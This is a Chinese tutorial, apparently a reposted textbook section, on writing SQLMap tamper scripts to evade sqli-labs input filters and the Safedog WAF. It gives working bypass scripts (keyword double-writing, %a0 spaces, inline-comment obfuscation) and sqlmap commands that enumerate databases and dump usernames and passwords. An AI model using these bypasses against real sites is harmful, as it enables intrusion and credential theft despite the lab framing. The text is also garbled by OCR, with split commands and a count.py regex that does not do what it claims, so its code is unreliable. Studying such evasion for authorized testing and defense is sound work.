当前位置:   article > 正文

SQLMap的Tamper脚本_sqlmap tamper

sqlmap tamper

 

 

由于SQL注入的影响过于广泛以及人们的网络安全意识普遍提升,网站往往 会针对SQL注入添加防SQL注入系统或者WAF 。这时,在渗透测试过程中就需要 绕过网站的安全防护系统。SQLMap是一款用来检测与利用SQL注入漏洞的免费 开源工具,不仅可以实现SQL注入漏洞的检测与利用的自动化处理,而且其自带 的Tamper脚本可以帮助我们绕过IDS/WAF的检测。

 

 

 

 

 

 

5.4.1    简介

SQLMap是一款基于Python开发的开源自动化SQL注入工具,功能强大且自带 了很多绕过脚本, 目前支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft    SQL Server 、Microsoft Access 、IBM DB2 、SQLite 、Firebird 、Sybase和SAP

MaxDB 。SQLMap采用了以下5种SQL注入技术:

·基于布尔的盲注:能根据页面的返回内容判断真假的注入技术。

·基于时间的盲注:不能根据页面的返回内容来判断信息,而是使用条件语句 查看时间延迟语句是否执行(即页面的返回时间是否增加),以此来判断。

·基于报错的注入:根据页面返回的错误信息来判断,或者把注入语句的结果 直接返回到页面中。

·堆查询注入:可以同时执行多条语句的执行时的注入。

在渗透测试过程中采用SQLMap ,只需要输入几个参数,就可以自动帮助我 们完成一系列的SQL注入。为了提高安全性,网站管理员往往会添加防SQL注入 系统或者WAF 。SQLMap提供的Tamper脚本可以帮助我们有效地绕过这些安全防 护,完成渗透测试。

现在SQLMap提供了57个Tamper脚本,具体内容如表5-1所示。

表5-1    Tamper脚本

f01f9a898e304aed88e7ad280afca215.png

 

 

 

 

 

663b3aab44774e83b4b8820785040353.png

 

56a65013837a4b178d8d3ffde923fea1.png

 

 

 

在渗透测试过程中,读者可根据表5-1使用相关的Tamper脚本来绕过 IDS/WAF的检测。

虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站 的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个 时候就需要我们针对目标的防护体系手动构建相应的Tamper脚本。

Tamper相当于一个加工车间,它会把我们的Payload进行加工之后发往目标网 站。下面我们简单介绍Tamper的结构:

U

#!/usr/bin/env python

"""

Copyright (c) 2006-2020 sqlmap developers (http://sqlmap .org/)

See the file 'LICENSE ' for copying permission

"""

# 导入SQLMap中lib\core\enums中的PRIORITY优先级函数

from lib.core .enums import PRIORITY

# 定义脚本优先级

__priority__ = PRIORITY .LOW

 

 

 

 

 

# 对当前脚本的介绍,可以为空

def dependencies() :

pass

"""

对传进来的payload进行修改并返回

函数有两个参数。主要更改的是payload参数,kwargs参数用得不多。在官方提供的Tamper脚本中 只被使用了两次,两次都只是更改了http-header

"""

def tamper(payload, **kwargs) :

# 增加相关的payload处理,再将payload返回

# 必须返回最后的payload

return payload

Tamper脚本的构建非常简单,其实渗透测试中真正的难点在于如何针对目标 网站的防护找出对应的绕过方法。

 

 

 

 

 

5.4.2    Tamper脚本的编写( 一)

 

经过5.4.1节对Tamper脚本的介绍,本节我们来编写绕过目标网站防SQL注入 系统的Tamper脚本。

此处以sqli-labs 的第26关为例,如图5-8所示。笔者的环境为PHP- 5.2.17+Apache。

54f004921dba49a59ffedb4a9c1ca39f.png

图5-8    sqli-labs第26关

以下为网站的过滤函数,可以看到网站过滤了or 、and 、/* 、-- 、# 、空格和斜 杠:

function blacklist($id)

{

$id= preg_replace( '/or/i ',"", $id);     //strip out OR (non case sensitive)

$id= preg_replace( '/and/i ',"", $id);     //Strip out AND (non case sensitive)

$id= preg_replace( '/[\/\*]/ ',"", $id);     //strip out /*

$id= preg_replace( '/[--]/ ',"", $id);     //Strip out --

$id= preg_replace( '/[#]/ ',"", $id);     //Strip out #

$id= preg_replace( '/[\s]/ ',"", $id);     //Strip out spaces

$id= preg_replace( '/[\/\\\\]/ ',"", $id);     //Strip out slashes

return $id;

}

表5-2所示是笔者经过测试得出的绕过方法:

表5-2    关键字与绕过方法

 

 

 

 

 

 

先编写第一个双写绕过脚本double-and-or.py:

# -*- coding:UTF-8 -*-

"""

Copyright (c) 2006-2020 sqlmap developers (http://sqlmap .org/)

See the file 'LICENSE ' for copying permission

"""

# 导入正则模块,用于字符的替换

import re

# sqlmap中lib\core\enums中的PRIORITY优先级函数

from lib.core .enums import PRIORITY

# 定义脚本优先级

__priority__ = PRIORITY .NORMAL

# 脚本描述函数

def dependencies() :

pass

def tamper(payload, **kwargs) :

# 将payload进行转存

retVal = payload

if payload :

# 使用re .sub函数不区分大小写地替换and和or

# 将and和or替换为anandd和oorr

retVal = re .sub(r"(?i)(or)", r"oorr", retVal)

retVal = re .sub(r"(?i)(and)", r"anandd", retVal)

# 把最后修改好的payload返回

return retVal

再编写第二个空格替换脚本space2A0.py 。在这里我们可以直接以官方Tamper 脚本的space2plus.py为模板进行更改:

 

#!/usr/bin/env python

# -*- coding:UTF-8 -*-

"""

Copyright (c) 2006-2020 sqlmap developers (http://sqlmap .org/)

See the file 'LICENSE ' for copying permission

"""

from lib.core .compat import xrange

from lib.core .enums import PRIORITY

__priority__ = PRIORITY .LOW

 

def dependencies() :

pass

 

def tamper(payload, **kwargs) :

retVal = payload

if payload :

 

 

 

 

 

retVal = ""

quote, doublequote, firstspace = False, False, False

for i in xrange(len(payload)) :

if not firstspace:

if payload[i] .isspace() :

firstspace = True

# 把原先的+改为%a0即可

retVal += "%a0"

continue

elif payload[i] == '\ ' ' :

quote = not quote

elif payload[i] == '" ' :

doublequote = not doublequote

elif payload[i] == " " and not doublequote and not quote:

# 把原先的+改为%a0即可

retVal += "%a0"

continue

retVal += payload[i]

return retVal

 

我们先看一下在不使用Tamper脚本的情况下,SQLMap对网站进行注入的情 况。运行如下代码:

>>> sqlmap -u "http://192 .168 .61 .134/sqli/Less-26/?id=1"

运行结果发现SQLMap无法进行注入:

e5c9ef9005514898b15e0ba5094a4311.png

 

我们在编写的绕过脚本中增加--tamper ,增加-v 3来查看输出的Payload 。代码 如下:

 

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps454.png&pos_id=zfsmxKS4

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps455.png&pos_id=RLaMJ8an

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps456.png&pos_id=RK45VnGM

>>>sqlmap -u "http://192 .168 .61 .1/sql/Less-26/?id=3" or .py,space2A0 .py" -v 3

--tamper "double-and-

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps457.png&pos_id=sywZpn9J

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps458.png&pos_id=TAb3JMyE

通过观察Payload的输出发现,脚本已经成功执行,如下所示:

SQLMap已经成功找出注入点,结果如下所示:

 

 

 

 

 

3280b81eab8b47cda628c53e07f21b13.png

 

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps461.png&pos_id=i8ToEcLu

U

>>>

 

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps462.png&pos_id=XmjXVTl0

U

sqlmap -u "http://192 .168 .61 .134/sqli/Less-26/?id=1" "double-and-or .py,space2A0 .py" –dbs

-v

3

--tamper

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps463.png&pos_id=nUT76m6j

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps464.png&pos_id=N5FLejWD

运行结果如下所示:

1d60c7fef9d540ff87b0344839d26c6a.png

接下来遍历security里面的数据表,代码如下:

 

 

 

 

 

>>>

sqlmap -u "http://192 .168 .61 .134/sqli/Less-26/?id=1" -v "double-and-or .py,space2A0 .py" -D "security" --tables

3 --tamper

运行结果如下所示:

fda82d3414434217bf6049471d2f46ce.png

再来遍历security数据库中users表的字段,代码如下:

>>>

sqlmap -u "http://192 .168 .61 .134/sqli/Less-26/?id=1" -v "double-and-or .py,space2A0 .py" -D "security" -T "users"

3 --tamper

--columns

运行结果如下所示:

 

 

 

 

 

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps470.png&pos_id=WpPcTre6

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps471.png&pos_id=gCgqZGjj

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps472.jpg&pos_id=BtH9ga2c

>>>

sqlmap -u "http://192 .168 .61 .134/sqli/Less-26/?id=1" -v "double-and-or .py,space2A0 .py" -D "security" -T "users" password" --dump

3 --tamper

-C "username,

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps473.png&pos_id=SyA9HwXj

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml9832%5Cwps474.png&pos_id=DQqGVxdG

 

 

 

运行结果如下所示:

dea3b58e5aa44b57ba314b138d66601f.png

但是这里发现,并没有数据出现。这说明最后遍历数据库数据的Payload还是 有问题。通过查看SQLMap的Payload发现,Payload中的count(* )出现了关键词

 

 

 

 

 

* ,说明是被过滤了。所以我们还需要再写一个Tamper把count(* )进行替换。这 里可以通过count(常数)来代替count(* )。

我们编写第三个脚本count.py ,把count(* )变成count(1):

 

#!/usr/bin/env python

# -*- coding:UTF-8 -*-

"""

Copyright (c) 2006-2020 sqlmap developers (http://sqlmap .org/)

See the file 'LICENSE ' for copying permission

"""

import re

from lib.core .enums import PRIORITY

__priority__ = PRIORITY .NORMAL

def dependencies() :

pass

def tamper(payload, **kwargs) :

retVal = payload

if payload :

# 把count(*)替换为count(1)

retVal = re .sub(r"(?i)count\*", r"count(1)", payload)

return retVal

然后继续进行注入,代码如下:

>>> sqlmap -u "http://192 .168 .61 .134/sqli/Less-26/?id=1" -v 3 --tamper

"double-and-or .py,space2A0 .py,count.py" -D "security" -T "users" -C

"username,password" --dump

运行结果如下所示:

 

 

 

 

 

这样我们通过3个Tamper脚本的搭配使用,成功绕过网站的防护完成了SQL 注入。

 

 

 

 

 

 

5.4.3    Tamper脚本的编写(二)

 

5.4.2节中我们讲了绕过网站自身防SQL注入系统的方法,本节将针对WAF编 写Tamper脚本进行绕过。

此处以sqli-labs靶场的第4关为例,如图5-9所示。笔者的环境为PHP- 5.2.17+Apache。

6cde88b1b72c43a28760c26b6eb8955d.png

图5-9    sqli-labs第4关

安装网站安全狗(Apache版)4.0V正式版,安全狗的防护参数设置如图5-10 和图5-11所示。

此时,我们再次尝试进行SQL注入时,安全狗就会进行拦截,如图5-12和图 5-13所示。

表5-3所示是笔者经过测试,总结的对当前版本安全狗的绕过方法。

 

 

 

 

 

图5-10    安全狗的防护设置1

 

 

 

3114e8bb88de44aca3883aa499359872.png

 

图5-11    安全狗的防护设置2

333a9acde2794a3b928eb5cd7eee57da.png

图5-12    安全狗拦截1

 

 

 

 

 

3a05bba981344f83938a5c764218cdb6.png

图5-13    安全狗拦截2

a5bfa3cf6c73410d8d7f5797e82a1197.png

表5-3    安全狗的绕过方法

b5d964090f0a4a999e844f15301144fd.png 8392740d05b24ef0874d8f5909c8e47e.png

我们编写一个Tamper脚本,把安全狗拦截的关键字进行替换:

 

#!/usr/bin/env python

#!/usr/bin/env python

from lib.core .enums import PRIORITY

from lib.core .settings import UNICODE_ENCODING

__priority__ = PRIORITY .NORMAL

def dependencies() :

 

 

 

 

 

pass

def tamper(payload, **kwargs) :

if payload :

payload = payload.replace("UNION","union/* !88888cas*/")

payload = payload.replace("--","/* !*/--")

payload = payload.replace("SELECT","/* !88888cas*/select")

payload = payload.replace("FROM","/* !99999c*//* !99999c*/from")

payload = payload.replace("#","/* !*/#")

payload = payload.replace("USER()","USER/* !()*/")

payload = payload.replace("DATABASE()","DATABASE/* !()*/")

payload = payload.replace(" ","/* !*/")

payload = payload.replace("=","/* !*/=/* !*/")

payload = payload.replace("AND","/* !*/AND/* !*/")

return payload

 

我们使用Tamper脚本再次尝试SQL注入,代码如下:

>>>sqlmap -u "http://192 .168 .61 .134/sqli/Less-4/?id=1" --tamper "Bypass .py" -v 3 --dbs

运行结果如下所示:

76a311d74b6c4779bc38d2571cb86638.png

可以看到,我们成功绕过安全狗的防护探测到数据库的信息,接下来我们探 测security数据库,代码如下:

>>>sqlmap -u "http://192 .168 .61 .134/sqli/Less-4/?id=1" --tamper "Bypass .py" -v 3 -D "security" –tables

运行结果如下所示:

 

 

 

 

 

39a1737b193f4754b8ef948f20d1dcf7.png

接下来遍历security数据库users表的字段,代码如下:

 

>>>sqlmap -u "http://192 .168 .61 .134/sqli/Less-4/?id=1" -v 3 -D "security" -T "users" --columns

--tamper

"Bypass .py"

运行结果如下所示:

e92fb7957edc40b3a9a205798a4d1eb7.png

再接下来就是遍历数据了,代码如下:

 

 

 

 

 

 

 

>>>sqlmap -u "http://192 .168 .61 .134/sqli/Less-4/?id=1" --tamper "Bypass .py" -v 3 -D "security" -T "users" -C "username,password" --dump

 

运行结果如下所示:

65080a53ad904b61a1c1b474c936050b.png

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/792945
推荐阅读
相关标签
  

闽ICP备14008679号